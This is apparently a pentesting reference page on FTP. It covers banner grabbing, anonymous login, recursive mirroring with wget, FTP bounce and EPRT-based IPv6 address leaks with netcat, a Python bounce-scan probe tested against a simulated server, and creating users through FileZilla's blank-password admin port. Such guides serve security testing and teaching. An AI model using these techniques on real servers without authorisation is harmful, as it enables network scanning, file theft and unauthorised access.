
21 - Pentesting FTP

Basic Information

The File Transfer Protocol (FTP) is a standard network protocol used for the transfer of computer files between a client and server on a computer network.

Default Port: 21

PORT STATE SERVICE
21/tcp open ftp

Banner Grabbing

nc -vn <IP> 21

Connections

In active FTP the client first opens the control connection from its port N to the server's command port, 21. The client then listens on port N+1 and tells the server that port number (with the PORT command). The server then opens the data connection from its port M (normally 20) to port N+1 on the client.

If the client sits behind a firewall that blocks incoming connections, active FTP breaks, because the data connection is inbound. The usual solution is passive FTP.

In passive FTP the client opens the control connection from its port N to port 21 on the server and then issues the PASV command. The server replies with one of its own port numbers, M, and the client opens the data connection from its port P to port M on the server, so both connections are outbound from the client.

Source: https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/

Anon login

anonymous : anonymous
ftp : ftp

ftp <IP>
>anonymous
>anonymous
>ls -a    # list all files, including hidden ones (dotfiles are a common place to stash things)
>binary   # set the transfer mode to binary (use for anything that is not plain text)
>ascii    # set the transfer mode to ASCII
>bye      # exit

Browser connection

You can connect to an FTP server from a browser (such as Firefox) using a URL like:

ftp://anonymous:anonymous@10.10.10.98

Download all files from FTP

wget -m ftp://anonymous:anonymous@10.10.10.98 # Mirror everything recursively (passive mode by default)
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Same, but force active mode (useful when the server's passive ports are filtered)

FTPBounce attack

Some FTP servers (almost any) accept the PORT command. It tells the server which IP address and port to connect to for the data connection, and nothing forces that address to be the client's own. You can therefore make the FTP server connect to some other host and port, and the server's reply to the next transfer command (for example LIST) tells you whether that port was open. This is the FTP bounce attack, and it lets you port-scan hosts that are reachable from the FTP server.

Read this to learn how to detect the issue and scan ports using this technique.

You can also use this technique to make one bounce-capable FTP server ask another bounce-capable FTP server to download a file for you. This is useful when the IP address of the bounce FTP server has access to more files than you do (for example an internal server that only accepts connections from it). Read this to learn how.

In modern FTP services you can use the EPRT command (RFC 2428) instead of PORT to make the server connect to a different IP/port. EPRT also supports IPv6, so you can make the FTP service connect to your IPv6 address and capture the IPv6 address of the FTP machine (the IPv6 side is sometimes less protected than the IPv4 side).

# Terminal 1: connect to the FTP control port, authenticate, and ask the server to open its data connection to your IPv6 address
# nc -nv <FTP-IP> 21
USER mk7hlqMYr1b77DWuiZ1kPkNZc2Q1SRRg
PASS mk7hlqMYr1b77DWuiZ1kPkNZc2Q1SRRg
EPRT |2|dead:beef:2::1007|5995|
LIST
# Terminal 2 (start it before sending LIST): listen on IPv6 and wait for the data connection
# nc -6lvnp 5995
Listening on :: 5995
Connection received on dead:beef::250:56ff:feb9:627d 50598
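The following Python script is an added example, not code from the original page: it implements the PORT/PASV/EPRT argument encoding described in the Connections section and then uses it the way an FTP bounce scan does, classifying the server's reply codes after PORT/EPRT and LIST. Because a bounce scan needs a live FTP server, the script includes a constructed stand-in (FakeFtpServer) for the control channel, with an assumed client address of 10.10.14.2 and assumed open ports; it is not a real FTP implementation, but the reply codes it returns are the standard RFC 959 ones (200 for an accepted PORT, 150/226 when the data connection was built, 425 when it could not be, 500 when the server refuses third-party addresses).

```python
"""FTP data-connection encoding and a bounce-scan probe (added example, not from the page)."""
import ipaddress
import re
from typing import Callable

# "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)." -> host h1.h2.h3.h4, port p1*256+p2
PASV_RE = re.compile(r"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


def parse_pasv(reply: str) -> tuple[str, int]:
    """Extract (host, port) from a 227 PASV reply; the port is two decimal bytes, high first."""
    m = PASV_RE.search(reply)
    if not reply.startswith("227") or m is None:
        raise ValueError(f"not a PASV reply: {reply!r}")
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    if max(h1, h2, h3, h4, p1, p2) > 255:
        raise ValueError(f"byte out of range in {reply!r}")
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def port_arg(host: str, port: int) -> str:
    """Encode a PORT argument: the four address octets and the port split into two bytes."""
    if not 0 < port < 65536:
        raise ValueError(f"bad port {port}")
    octets = ipaddress.IPv4Address(host).packed
    return ",".join(str(b) for b in octets) + f",{port >> 8},{port & 0xFF}"


def eprt_arg(host: str, port: int) -> str:
    """Encode an EPRT argument (RFC 2428): |1|ipv4|port| or |2|ipv6|port|."""
    addr = ipaddress.ip_address(host)
    return f"|{2 if addr.version == 6 else 1}|{addr.compressed}|{port}|"


def bounce_probe(send: Callable[[str], str], target: str, port: int) -> str:
    """Ask the server to connect its data channel to target:port, then trigger it with LIST.

    `send` writes one command line on the control channel and returns the whole reply.
    Returns "open", "closed", "refused" (server will not bounce) or "unknown:<code>".
    """
    if ipaddress.ip_address(target).version == 6:
        reply = send("EPRT " + eprt_arg(target, port))
    else:
        reply = send("PORT " + port_arg(target, port))
    if not reply.startswith("200"):
        return "refused"          # e.g. 500/501: third-party addresses are rejected
    code = send("LIST")[:3]
    if code in ("125", "150", "226"):
        return "open"             # the server managed to connect to target:port
    if code in ("425", "426"):
        return "closed"           # "Can't build data connection"
    return f"unknown:{code}"


class FakeFtpServer:
    """Constructed control-channel stand-in so the probe runs offline (not a real server).

    open_ports: (host, port) pairs the pretend server can reach.
    allow_bounce=False mimics a hardened server that only accepts PORT/EPRT targets equal
    to the client's own address (client_ip is an assumed value for this example).
    """

    def __init__(self, open_ports, client_ip="10.10.14.2", allow_bounce=True):
        self.open_ports = set(open_ports)
        self.client_ip = client_ip
        self.allow_bounce = allow_bounce
        self.pending = None       # target of the last accepted PORT/EPRT

    def send(self, line: str) -> str:
        verb, _, arg = line.partition(" ")
        if verb == "PORT":
            f = arg.split(",")
            target = (".".join(f[:4]), int(f[4]) * 256 + int(f[5]))
        elif verb == "EPRT":
            _, _proto, host, port, _ = arg.split("|")
            target = (host, int(port))
        elif verb == "LIST":
            if self.pending in self.open_ports:
                return "150 Here comes the directory listing.\r\n226 Directory send OK.\r\n"
            return "425 Can't build data connection: Connection refused.\r\n"
        else:
            return "502 Command not implemented.\r\n"
        if not self.allow_bounce and target[0] != self.client_ip:
            return f"500 Illegal {verb} command.\r\n"
        self.pending = target
        return f"200 {verb} command successful.\r\n"


if __name__ == "__main__":
    host, port = parse_pasv("227 Entering Passive Mode (10,10,10,98,195,80).")
    print(f"PASV data endpoint: {host}:{port}")
    # Assumed targets reachable from the pretend FTP server (constructed sample data).
    server = FakeFtpServer({("172.16.0.5", 22), ("dead:beef::1", 80)})
    for tgt, p in [("172.16.0.5", 22), ("172.16.0.5", 23), ("dead:beef::1", 80)]:
        print(f"{tgt}:{p} -> {bounce_probe(server.send, tgt, p)}")
```

Against a real server you would replace `server.send` with a function that writes the line to the port 21 socket and reads until the final reply line; the classification logic stays the same. A server that answers 500/501 to any PORT or EPRT whose address differs from the control connection's peer is not usable for bouncing, which is exactly the check the probe reports as "refused".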

Pentest

Anonymous login and FTP bounce checks are performed by default by nmap with the -sC option (the ftp-anon and ftp-bounce NSE scripts).

Filezilla Server

FileZilla Server usually binds its administrative interface to localhost (port 14147). If you can tunnel from your machine to that port, you can connect to it with a blank password and create a new user for the FTP service.

Config files

ftpusers
ftp.conf
proftpd.conf